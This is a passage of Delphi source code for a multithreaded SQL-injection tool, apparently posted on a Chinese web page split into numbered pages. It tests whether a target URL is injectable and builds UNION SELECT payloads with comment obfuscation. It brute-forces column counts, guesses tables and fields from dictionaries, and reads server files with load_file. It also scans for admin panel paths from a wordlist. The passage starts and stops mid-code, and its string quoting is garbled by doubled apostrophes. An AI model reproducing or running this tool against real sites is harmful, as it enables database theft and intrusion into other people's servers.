dThreadExit(sender: TObject);
begin
inc(N);
pg1.StepIt;
if N = lsbDict.Count then
begin
isFinish :=false;
MM.Lines.Add('''''''');
MM.Lines.Add(''''字段猜解结束。。。'''');
pg1.Visible :=False;
sbscan2.Caption :=''''猜解'''';
exit;
end;
end;
procedure TForm1.lvFieldClick(Sender: TObject);
begin
if lvField.Selected.Caption=''''1'''' then
begin
EdtField1.Text :=lvField.Items[0].SubItems.GetText;
spField1.Text :=lvField.Items[0].Caption;
end else
begin
EdtField2.Text :=lvField.Selected.SubItems.GetText;
spField2.Text :=lvField.Selected.Caption;
end;
end;
procedure TForm1.lvTableClick(Sender: TObject);
begin
EdtTable.Text :=lvTable.Selected.SubItems.GetText;
end;
procedure TForm1.sbrecordClick(Sender: TObject);
var i:integer;
begin
iStr :='''''''';
for i:=1 to strtoint(EdtFieldNum.Text) do
begin
if i=strtoint(spField1.Text) then
iStr :=iStr+'''',''''+trim(EdtField1.Text)
else if i=strtoint(spField2.Text) then
iStr :=iStr+'''',''''+trim(EdtField2.Text)
else iStr :=iStr+'''',''''+inttostr(i);
end;
if iStr<>'''''''' then
iStr :=copy(iStr,2,length(iStr)-1);
InjUrl :=Url+''''/**/and/**/1=2/**/union/**/select/**/''''+iStr
+''''/**/from/**/''''+trim(EdtTable.Text)+''''/**/where/**/''''+trim(EdtID.Text)+''''/*'''';
MM.Lines.Add(InjUrl);
if Get(InjUrl,'''''''') then
begin
wb.Navigate(InjUrl);
pcPHPInj.ActivePageIndex :=3;
end;
end;
procedure TForm1.sbfileClick(Sender: TObject);
var i,j:integer;
str,fname:string;
begin
if EdtFileName.Text='''''''' then
begin
MsgBox(''''请输入要猜解的文件名!'''');
exit;
end;
fname :=trim(EdtFileName.Text);
iStr :='''''''';
for i:=1 to length(fname) do
begin
iStr :=iStr+'''',''''+ IntToStr(Ord(fname));
end;
if iStr<>'''''''' then
begin
iStr :=copy(iStr,2,length(iStr)-1);
iStr :=''''load_file(char(''''+iStr+''''))'''';
end;
str :='''''''';
for j:=1 to strtoint(EdtFieldNum.Text) do
begin
if j=strtoint(spNum.Text) then
str :=str+'''',''''+iStr
else str :=str+'''',''''+inttostr(j);
end;
if str<>'''''''' then
str :=copy(str,2,length(str)-1);
InjUrl :=Url+''''/**/and/**/1=2/**/union/**/select/**/''''+str+''''/*'''';
MM.Lines.Add(InjUrl);
if Get(InjUrl,'''''''') then
begin
wb.Navigate(InjUrl);
pcPHPInj.ActivePageIndex :=3;
end;
end;
procedure TForm1.sbstop2Click(Sender: TObject);
var i:integer;
begin
isFinish :=true;
{ if N>=lsbDict.Count then exit;
for i:=N to lsbDict.Count-1 do
begin
if scanField.FreeOnTerminate then
begin
scanField.Suspend;
scanField.Free;
end;
end;
MM.Lines.Add('''''''');
MM.Lines.Add(''''字段猜解结束。。。''''); }
end;
procedure TForm1.sbscan3Click(Sender: TObject);
var
i,iPos,Sum:integer;
begin
if isFinish=false then
begin
Url :=trim(EdtInjUrl.Text);
if pos(''''http://'''',Url)>0 then
begin
Url :=copy(Url,8,length(Url)-7);
iPos :=pos(''''/'''',Url)
end else
iPos :=pos(''''/'''',Url);
Url :=''''http://''''+copy(Url,1,iPos-1);
if Url='''''''' then exit;
lsbDict.Items.Clear;
ListBox1.Items.Clear;
MM.Lines.Clear;
M :=0;
lsbDict.Items.LoadFromFile(ExtractFilePath(Application.ExeName)+''''Dict_Manager.txt'''');
Sum :=lsbDict.Count;
pg1.Min :=0;
pg1.Max :=sum;
pg1.Step :=1;
pg1.Position :=0;
pg1.Visible :=true;
MM.Lines.Add(''''开始猜解后台路径。。。'''');
MM.Lines.Add('''''''');
SetLength(scanManager,Sum); // 动态设置线程的数量
////开始扫描后台路径
for i:=0 to Sum-1 do
begin
scanManager := scanManagerThread.Create(Url,i,ListBox1,MM);
scanManager.OnTerminate := ManagerThreadExit;
end;
end;
if isFinish=true then
begin
try
for i:=M to lsbDict.Count-1 do
begin
if scanManager.FreeOnTerminate then
begin
scanManager.Suspend;
scanManager.Free;
end;
end;
MM.Lines.Add('''''''');
MM.Lines.Add(''''后台路径猜解结束。。。'''');
except
end;
end;
isFinish :=true;
end;
procedure TForm1.ManagerThreadExit(sender: TObject);
begin
inc(M);
pg1.StepIt;
if M = lsbDict.Count then
begin
isFinish :=true;
MM.Lines.Add('''''''');
MM.Lines.Add(''''后台路径猜解结束。。。'''');
pg1.Visible :=False;
exit;
end;
end;
procedure TForm1.sbstop3Click(Sender: TObject);
var i:integer;
begin
isFinish :=false;
{ if M>=lsbDict.Count then exit;
try
for i:=M to lsbDict.Count-1 do
begin
if scanManager.FreeOnTerminate then
begin
scanManager.Suspend;
scanManager.Free;
end;
end;
MM.Lines.Add('''''''');
MM.Lines.Add(''''后台路径猜解结束。。。'''');
except
end; }
end;
procedure TForm1.ListBox1Click(Sender: TObject);
begin
wb.Navigate(ListBox1.Items.GetText);
pcPHPInj.ActivePageIndex :=3;
end;
procedure TForm1.FormShow(Sender: TObject);
begin
pg1 :=TProgressBar.Create(nil);
pg1.Parent :=StatusBar1;
pg1.Height :=StatusBar1.Height;
pg1.Width :=StatusBar1.Width;
pg1.Visible :=False;
end;
end.
unit Unit2;
interface
uses
Classes,StdCtrls,Windows,SysUtils,ComCtrls,IdHTTP;
var
CS:TRTLCriticalSection; //定义全局临界区
type
//扫描网站是否可以注入及当前注入点对应表字段数线程类
scanThread = class(TThread)
protected
FUrl,InjUrl,FStr: string; //要注入的网站地址
FKeyWord: string; //关键字
FState: boolean;
FMemo: TMemo;
FListView: TListView;
FNum: Integer;
FTable,FValue :string;
procedure Execute; override;
public
//constructor Create(Url,KeyWord:string;Memo:TMemo);
end;
//扫描表段注入线程类
scanTableThread = class(scanThread)
private
procedure scanTableResult;
protected
procedure Execute; override;
public
constructor Create(Url,Str,KeyWord:String;Memo:TMemo;ListView:TListView);
end;
//扫描字段注入线程类
scanFieldThread = class(scanThread)
private
procedure scanFieldResult;
protected
procedure Execute; override;
public
constructor Create(Url,Str,KeyWord,Table:String;Num:integer;Memo:TMemo;ListView:TListView);
end;
function Get(URL,Key: string): boolean;
var
stoped:boolean;
implementation
uses Unit1;
function Get(URL,Key: string): boolean;
var
IDHTTP: TIDHttp;
ss: String;
begin
Result:= False;
IDHTTP:= TIDHTTP.Create(nil);
try
try
idhttp.HandleRedirects:= true; //必须支持重定向否则可能出错
idhttp.ReadTimeout:= 30000; //超过这个时间则不再访问
ss:= IDHTTP.Get(URL);
if Key='''''''' then
begin
if IDHTTP.ResponseCode=200 then
Result :=true;
end else
begin
if (IDHTTP.ResponseCode=200) and (pos(Key,ss)>0) then
Result :=true;
end;
except
end;
finally
IDHTTP.Free;
end;
end;
{constructor scanThread.Create(Url,KeyWord:string;Memo:TMemo);
begin
FMemo :=Memo;
FUrl :=Url;
FKeyWord :=KeyWord;
FreeOnTerminate := True; // 自动删除
inherited Create(False); // 直接运行
end;}
procedure scanThread.Execute;
var
i:integer;
iStr:string;
begin
FMemo :=Form1.MM;
FUrl :=trim(Form1.EdtInjUrl.Text);
FKeyWord :=trim(Form1.EdtKey.Text);
FMemo.Lines.Clear;
FMemo.Lines.Add(''''正在检测注入点是否可用。。。'''');
if (not Get(FUrl,'''''''')) or (not Get(FUrl+''''/**/and/**/1=1/*'''',''''''''))
or (not Get(FUrl+''''/**/and/**/1=2/*'''','''''''')) then
begin
FMemo.Lines.Add(''''注入点不可用,猜解终止!'''');
exit;
end;
//开始猜解字段数目
i:=1;
iStr:=''''1'''';
FState :=False;
FMemo.Lines.Add('''''''');
FMemo.Lines.Add(''''开始猜解字段数目。。。'''');
FMemo.Lines.Add('''''''');
while not FState do
begin
inc(i);
if i>30 then
begin
FMemo.Lines.Add(''''最大猜解字段数大于30,猜解终止!'''');
FState :=True;
exit;
end;
iStr:=iStr+'''',''''+IntToStr(i);
InjUrl :=FUrl+''''/**/and/**/1=1/**/union/**/select/**/''''+iStr+''''/*'''';
FMemo.Lines.Add(InjUrl);
if Get(InjUrl,FKeyWord) then
&上一页 [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] ... 下一页 >> |
